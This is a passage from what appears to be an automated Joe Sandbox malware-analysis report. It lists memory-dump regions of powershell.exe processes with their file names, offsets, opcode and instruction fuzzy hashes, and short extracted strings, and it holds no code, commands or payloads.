                                                                                          • Instruction ID: 026f1135264a2c9a228321c397fef745476693be2e03fcf2e8d5511fccc61c2c
                                                                                          • Opcode Fuzzy Hash: 2fd9811a3b6273587a0ef26f0a6a123e7ba5e08bcdd88bbd60aab3d121fda2bf
                                                                                          • Instruction Fuzzy Hash: EFB1B5B4E012099FDB55DFA9D980A9DFBF2FF88304F108629E419AB305DB34A945CF90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: efb9f7be4630a5ad9597aaa52b7260f157306589ea3b40f712b6f3092e1d5aff
                                                                                          • Instruction ID: c5fb3db8040273764049d67123c390781cc4b8bdce327fca1b886e53978eaa16
                                                                                          • Opcode Fuzzy Hash: efb9f7be4630a5ad9597aaa52b7260f157306589ea3b40f712b6f3092e1d5aff
                                                                                          • Instruction Fuzzy Hash: BBB196B4E012199FDB54DFA9D980A9DFBF2FF88304F108629E419AB345DB34A945CF90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-2113499236
                                                                                          • Opcode ID: 88c752e5a86bfa88bafa588d13fc73b6051a8ffde9a9085a38aa79537ffc5b81
                                                                                          • Instruction ID: 4d5f4da8801baadb97e8d1949cc49bc5077b14ed93da08fcd2a0609034ee196b
                                                                                          • Opcode Fuzzy Hash: 88c752e5a86bfa88bafa588d13fc73b6051a8ffde9a9085a38aa79537ffc5b81
                                                                                          • Instruction Fuzzy Hash: 512147B1B002069BDB385A7EAC01727BBEF9BC175EF24843AE615CB381ED75C8508761
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq
                                                                                          • API String ID: 0-2206495126
                                                                                          • Opcode ID: f6decf9e30f5a70d1ab1aae7a738eb3e0e25b63e330877312fd60c205a705f5d
                                                                                          • Instruction ID: 33ac92ba49d19532ffcc1ec098eb215a7d6dbc77325c2d367d8e81a71cb98537
                                                                                          • Opcode Fuzzy Hash: f6decf9e30f5a70d1ab1aae7a738eb3e0e25b63e330877312fd60c205a705f5d
                                                                                          • Instruction Fuzzy Hash: 96112B7170D7D64FC72E533C28202672FBA5FC3150B2D00DBD091DB292CA584D0583A7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: {Yr^$Yr^
                                                                                          • API String ID: 0-3839052442
                                                                                          • Opcode ID: 2c5d47c31aee193412f50e9d227563068eddc03438db14c7d841595128acc05c
                                                                                          • Instruction ID: bd06fcefe9f41ca92f883288811ce060f18d0ef796f133752df6faa313622cad
                                                                                          • Opcode Fuzzy Hash: 2c5d47c31aee193412f50e9d227563068eddc03438db14c7d841595128acc05c
                                                                                          • Instruction Fuzzy Hash: 669163B0F016159BDB19EFB589115AF7BF6EF84700B00892DE106AB358DF34AE058BC6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-359900465
                                                                                          • Opcode ID: 72fa86a98f209a232eef55b7769880ac6ddb9fecf578ee0dd0238c05c8cb0e45
                                                                                          • Instruction ID: 9768befa16d310688ea60e745d9854bf9ad955d4a8ca18e97eff439a71d6f93c
                                                                                          • Opcode Fuzzy Hash: 72fa86a98f209a232eef55b7769880ac6ddb9fecf578ee0dd0238c05c8cb0e45
                                                                                          • Instruction Fuzzy Hash: 58123AB1B24282EFCB259B7C841176ABFA29FD1314F1480BAD545CF652DB71DC81C7A2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$|,j
                                                                                          • API String ID: 0-1469847931
                                                                                          • Opcode ID: ab0e6146f223e4570f408a1f11718d01fc0884fb12e8ed4a475f8192aae185b9
                                                                                          • Instruction ID: 154044a29c37556aa94cf22578868ac8d2bedea53543c3d9de423c395878cf0b
                                                                                          • Opcode Fuzzy Hash: ab0e6146f223e4570f408a1f11718d01fc0884fb12e8ed4a475f8192aae185b9
                                                                                          • Instruction Fuzzy Hash: DE2249B1B24207EFCB258B7884516AABBE5FFC6310F1480BAE505DB651DB35CD41CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (jq
                                                                                          • API String ID: 0-3225323518
                                                                                          • Opcode ID: 8bc91e099a5d9e580010127cb64c8dfaec7f10a38fb471e64a47a485e8549c6d
                                                                                          • Instruction ID: 908ec04b7004e2082f0f47f0ca7ccccb55caa94be82183c888d0b646a71cd202
                                                                                          • Opcode Fuzzy Hash: 8bc91e099a5d9e580010127cb64c8dfaec7f10a38fb471e64a47a485e8549c6d
                                                                                          • Instruction Fuzzy Hash: D5416E34B182048FDB04DF68C454AAEBBF2EF8D715F259498E402AB391CB35DD41CB61
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (&fq
                                                                                          • API String ID: 0-1822945044
                                                                                          • Opcode ID: 585e976ce41463aa0444f72b320562232ff25cda33ac38d2d658720160127718
                                                                                          • Instruction ID: 6952e9c986ba12c96334099b255602bef9fdd293f41c83e4520b6614b7160329
                                                                                          • Opcode Fuzzy Hash: 585e976ce41463aa0444f72b320562232ff25cda33ac38d2d658720160127718
                                                                                          • Instruction Fuzzy Hash: 6021AE76A042588FCB14DFAED440B9EBFF5EF88320F24846AD119E7340CB759945CBA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1fa568eb5bd64150a538fb628a81ca0304bdf847f9bad72cd328d3a604ac92d
                                                                                          • Instruction ID: 9fdfe9e10a42276414d2f9e8a68f27307c0aeed6f364cca5cce7c13127625b1e
                                                                                          • Opcode Fuzzy Hash: b1fa568eb5bd64150a538fb628a81ca0304bdf847f9bad72cd328d3a604ac92d
                                                                                          • Instruction Fuzzy Hash: 5F914BB4A00605DFCB15CF99C494AAEFBB1FF88310B248669D915AB3A5C735FC51CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f9bbf97c83179d34cea22b6f4a26d1907ca5e58e783231729d3388c0faf54c60
                                                                                          • Instruction ID: 4babb9117a096913bb860e81dd380829735fe0e6714b3fcd83f6786c0fd446c4
                                                                                          • Opcode Fuzzy Hash: f9bbf97c83179d34cea22b6f4a26d1907ca5e58e783231729d3388c0faf54c60
                                                                                          • Instruction Fuzzy Hash: 386108B1D012489FCB14DFA9D584A9DBBF1FF88310F24812AE409EB354EB709D85CB61
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 07468ad00fcb09f3d33df04c968a4699a79bef061348eeebd31f5391fbc048de
                                                                                          • Instruction ID: 3deb0386cc33bd7c66be92c5ee0181a7923a232d2f54a4a043c67433effa2468
                                                                                          • Opcode Fuzzy Hash: 07468ad00fcb09f3d33df04c968a4699a79bef061348eeebd31f5391fbc048de
                                                                                          • Instruction Fuzzy Hash: A951AD757182059FD704DB69E844A2E77FAFFC8318B248469E409DB351EB31DC41CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: da41529490faf92198cbf63de0449e10f235b046dd880ff19fa804d66824f16a
                                                                                          • Instruction ID: 074d8c42d18ff716749f3efa0d08813a0e5cfca36e4bfb81e4ea4f031fda6f68
                                                                                          • Opcode Fuzzy Hash: da41529490faf92198cbf63de0449e10f235b046dd880ff19fa804d66824f16a
                                                                                          • Instruction Fuzzy Hash: 585105B1E012489FCB14CFA9D584A9DBFF5EF88310F14816AE809EB354EB749985CB61
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b671619f19c5f30dfe580607cb0ceb4b889efc25b3aec5237cb25bf04e1a5a75
                                                                                          • Instruction ID: aa552d77a6c7376f1e8e02c9b6330f6020f79b1fa321a909a3c49d1698c8de15
                                                                                          • Opcode Fuzzy Hash: b671619f19c5f30dfe580607cb0ceb4b889efc25b3aec5237cb25bf04e1a5a75
                                                                                          • Instruction Fuzzy Hash: 304115F1A30243EBCB25DE64C601AAABBB2AF91354F0480A5E9049F253D735DD45CBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 48139aed53b43370e0025ea27ff6edbd56cf05530e9637fc0931f9550aa40cb2
                                                                                          • Instruction ID: 26e1b106b18bfb15d0f66a2bc89b55349d8b188b71e03dfeb05fae4fa6eec378
                                                                                          • Opcode Fuzzy Hash: 48139aed53b43370e0025ea27ff6edbd56cf05530e9637fc0931f9550aa40cb2
                                                                                          • Instruction Fuzzy Hash: 7D4107B4A005059FCB09CF59C498AAEFBB1FF48310B158669D915AB364C736FC51CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a8c25bba8a98639bf6a85a0fd40c10872682deac727e29f1fbc2f89827975d52
                                                                                          • Instruction ID: 342c46ba90766ec60074962a4e9421392c9afcc4b98dbe3ea1f368bc3567f20c
                                                                                          • Opcode Fuzzy Hash: a8c25bba8a98639bf6a85a0fd40c10872682deac727e29f1fbc2f89827975d52
                                                                                          • Instruction Fuzzy Hash: AA31A0713016119FC709DB79E895BAEBBA6EFC5320F008629E509CB351DF70AD45CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 58de91b6099cfc813498ce30066df0a428cf64409bfbb69658e890c2ae26fd38
                                                                                          • Instruction ID: c92bfa4c09756dafe7e7ee9e7b5fea0f36b616759aeda319ccc62e7f51658fab
                                                                                          • Opcode Fuzzy Hash: 58de91b6099cfc813498ce30066df0a428cf64409bfbb69658e890c2ae26fd38
                                                                                          • Instruction Fuzzy Hash: 74314D34A18115CFCB14CF64D598AAEBBF2EF8D715F2590A8E806AB361CB31DC41CB21
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 03838c6eb3409479d9e85ced30a60bddc99a6d848c06e192b07a802398317608
                                                                                          • Instruction ID: 9bf5927b408838924a8dfa7f00bf22ccaf240b82d72e9e634bf1f3d529a3f22a
                                                                                          • Opcode Fuzzy Hash: 03838c6eb3409479d9e85ced30a60bddc99a6d848c06e192b07a802398317608
                                                                                          • Instruction Fuzzy Hash: 14319F71A001098FDB05DBB9D4916EEBFF2EF99310F108029E405EB391EB359C418F52
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bc9a566eadbaeac936053c46a34ca0f2b9faf281f864c0db5eea0f8287b56306
                                                                                          • Instruction ID: e99e41c24b441202ccbd79c8db15c5fafceca91bc1aee59f207ddadbc985e30b
                                                                                          • Opcode Fuzzy Hash: bc9a566eadbaeac936053c46a34ca0f2b9faf281f864c0db5eea0f8287b56306
                                                                                          • Instruction Fuzzy Hash: AC3191B4A002099FDB04DFA4D855AFE7BB6EF84300F11846AE114EB396DA389E418F61
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aac0575159086b072cbc1f171746d5eba5b561cdba7065f89a132b788c29fd85
                                                                                          • Instruction ID: 07f64bfa78f27f42eee408ddbf1271fa4623ae800562287fab89029941222b30
                                                                                          • Opcode Fuzzy Hash: aac0575159086b072cbc1f171746d5eba5b561cdba7065f89a132b788c29fd85
                                                                                          • Instruction Fuzzy Hash: 98317AB0A002199FDB08DFB9C5957AEBAF6EF99310F108029E405EB391EB349C018F52
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab20884fea91ac2f049d19d782994ffb953984f772793a5b3f162913042bddc7
                                                                                          • Instruction ID: 04676321d79c170d733cfafee9ccc896af459fca6ee319f1cb22fe730afdf94d
                                                                                          • Opcode Fuzzy Hash: ab20884fea91ac2f049d19d782994ffb953984f772793a5b3f162913042bddc7
                                                                                          • Instruction Fuzzy Hash: AC31ACB59017448EDB60CF6AD4883DAFBFAEF88320F28C41ED45D97255CA746886CB51
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6497fbbdbef39680ddbcb82f19731ef13990183ef4a5cae2953cafca944891e9
                                                                                          • Instruction ID: f3f8815516200520f641b23febb8ba020ca4ee0b8f8ec4f61e52f6b2a3935889
                                                                                          • Opcode Fuzzy Hash: 6497fbbdbef39680ddbcb82f19731ef13990183ef4a5cae2953cafca944891e9
                                                                                          • Instruction Fuzzy Hash: 1E21D12131C3A04FC7119769A8A06EABFB59F86311F1800AAE585CB6B3C766CC8587A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e5bccec14291b4cbc736ae570e23930d9c5eac3f27fe6027456c5b938f51869a
                                                                                          • Instruction ID: 01307d18e9ba25601311fc90c2548ca31f063e2627c614c6a10c724fff513b1c
                                                                                          • Opcode Fuzzy Hash: e5bccec14291b4cbc736ae570e23930d9c5eac3f27fe6027456c5b938f51869a
                                                                                          • Instruction Fuzzy Hash: 53316FB4A002099FDB04EFA8D855AEE7BB6FF84300F118469E215BB395DE359E418F91
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1911719534.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_81d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 034dd92f1b22ad020ddaeac08181879a4664b0d6200f4092d654762b73a10a5b
                                                                                          • Instruction ID: 36c55e7faf1ac8de773f148ced0a78908e2c04f479ba027a2f3b9751576a63b1
                                                                                          • Opcode Fuzzy Hash: 034dd92f1b22ad020ddaeac08181879a4664b0d6200f4092d654762b73a10a5b
                                                                                          • Instruction Fuzzy Hash: 7F2105B1504200EFCB05CF14D9C0B27BB69FF88314F24C5ADEA098A257C336C896CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1911719534.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_81d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 43df407f2220aec1c70b89c771941af16a3562b9d5dd3861d5e4724e05b61f4c
                                                                                          • Instruction ID: 47074df6e321de2992d7e6c28b84522635eb0787a1f89a02d4f5c2a87cf18e58
                                                                                          • Opcode Fuzzy Hash: 43df407f2220aec1c70b89c771941af16a3562b9d5dd3861d5e4724e05b61f4c
                                                                                          • Instruction Fuzzy Hash: 712137B5504604DFCB14CF14C9C0B66BB69FF88318F24C57DDA0A8B243C33AD886CA61
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3da1e5e63a9db3df7c4f45915e9775f319ceff5e5a85789292d7f4e1b3402f44
                                                                                          • Instruction ID: e5f592340b1a083f096406c706bc4aa46eaea5fa967dea0835067a99c3f583e3
                                                                                          • Opcode Fuzzy Hash: 3da1e5e63a9db3df7c4f45915e9775f319ceff5e5a85789292d7f4e1b3402f44
                                                                                          • Instruction Fuzzy Hash: 77215AB09057448EDB60CF6AC58878AFBFAFF88320F28C41ED85D97245DB746885CB65
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 723c0c69ae0016698753577f8e384bd4b3c00bf9c2d36a03c358a1c1a838ddbc
                                                                                          • Instruction ID: 9661d7465fb9d4194cebf5ec4ca2b28d2da5d1dd064f17fb76cc443d50347aaf
                                                                                          • Opcode Fuzzy Hash: 723c0c69ae0016698753577f8e384bd4b3c00bf9c2d36a03c358a1c1a838ddbc
                                                                                          • Instruction Fuzzy Hash: 9111E97AB101188FCB04DBACE8409ED77F6EFC8315B0440A9E909EB315DB35DD518B91
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1911719534.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_81d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf7c6e54c1a5606df9920c627ceee2d02bff4a31f99f9d7d2463bdde2845d744
                                                                                          • Instruction ID: 06de1f2b6f37e04ba0f45188fed7ac78cc5375ceb7c4ce066f19f81f0ffa6994
                                                                                          • Opcode Fuzzy Hash: bf7c6e54c1a5606df9920c627ceee2d02bff4a31f99f9d7d2463bdde2845d744
                                                                                          • Instruction Fuzzy Hash: E7218C76504240DFCB06CF50D9C4B56BF72FF88314F28C5A9D9498A657C33AD8AACB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1911719534.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_81d000_powershell.jbxd
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8ee094059b6a627412da14f1e27cb6abf9eee6d457b90054bd503fb9c3b42ffa
                                                                                          • Instruction ID: 9d3b64ce7b53f981be75d55f609fa0e067cda2bac23f0f2e9b2c89661240b322
                                                                                          • Opcode Fuzzy Hash: 8ee094059b6a627412da14f1e27cb6abf9eee6d457b90054bd503fb9c3b42ffa
                                                                                          • Instruction Fuzzy Hash: 3FE0EC7630C3914F8B57D16978600F59F738AE236032985B7F185DF286DD26894A4BA3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1448a23bd765d03bec12f59439509a634085339c23cff10ea0fc7e1d3693248
                                                                                          • Instruction ID: d8afeb3be606ed9c4347689e2cbfa49310ac7236e1285d5684905a97fb056ce8
                                                                                          • Opcode Fuzzy Hash: c1448a23bd765d03bec12f59439509a634085339c23cff10ea0fc7e1d3693248
                                                                                          • Instruction Fuzzy Hash: 96E0DF3A90920A8FCB04DBB9E8464FABFB8AB44304F104226D949C3740DA314896CBC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1f028ab3a2541afd4595369f3147c5c986469d1380868f2881e938551029ad1d
                                                                                          • Instruction ID: 9ca6d44a364a770775204b36349e4d2f772fadae91e8fa5789edbb9dcaa99de0
                                                                                          • Opcode Fuzzy Hash: 1f028ab3a2541afd4595369f3147c5c986469d1380868f2881e938551029ad1d
                                                                                          • Instruction Fuzzy Hash: 37E0DF3530422047CB09377AA80D2AF7A6EFFC5724F00002AE70A83381CF68090183D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: af4ced701223cc96640d2c2ea822134442dbefab37ccc3e02138af82df1bbf12
                                                                                          • Instruction ID: 7439a32059da8bc25e0bb500ed90e7a8fab4199580e356c360784495ce7866c9
                                                                                          • Opcode Fuzzy Hash: af4ced701223cc96640d2c2ea822134442dbefab37ccc3e02138af82df1bbf12
                                                                                          • Instruction Fuzzy Hash: AAE01270D4420A9F8B90EF7C98415AEFBF4EB49300F2084AEC948D7611E7329A12CBD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 634c372dd2118966c953f7046e9e8ac0b2719c0793d6060cd9fad908e7eaa1b1
                                                                                          • Instruction ID: 02b2f326f0eecebd0e749b0f1a5f206010abe9652df5cd1846788b402f12a84f
                                                                                          • Opcode Fuzzy Hash: 634c372dd2118966c953f7046e9e8ac0b2719c0793d6060cd9fad908e7eaa1b1
                                                                                          • Instruction Fuzzy Hash: E6D0A7A27031252746B571FE1A126FB91EF8FC46A47060236EA0AC7343EC64CC0243F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06ca9e6893f3ab49f50721f3e45d2187719a0aadb533a5ca3d3ee5c0eb6d857d
                                                                                          • Instruction ID: f4946a11ffd3835d55c52e44f997664a2a17ec72243b0a33f0a998d84ac0abb5
                                                                                          • Opcode Fuzzy Hash: 06ca9e6893f3ab49f50721f3e45d2187719a0aadb533a5ca3d3ee5c0eb6d857d
                                                                                          • Instruction Fuzzy Hash: 2AE0C231701A14578225A62EA81089F7BEBEFC97B1315492EE009C7740DE68DD0247E6
                                                                                          Memory Dump Source
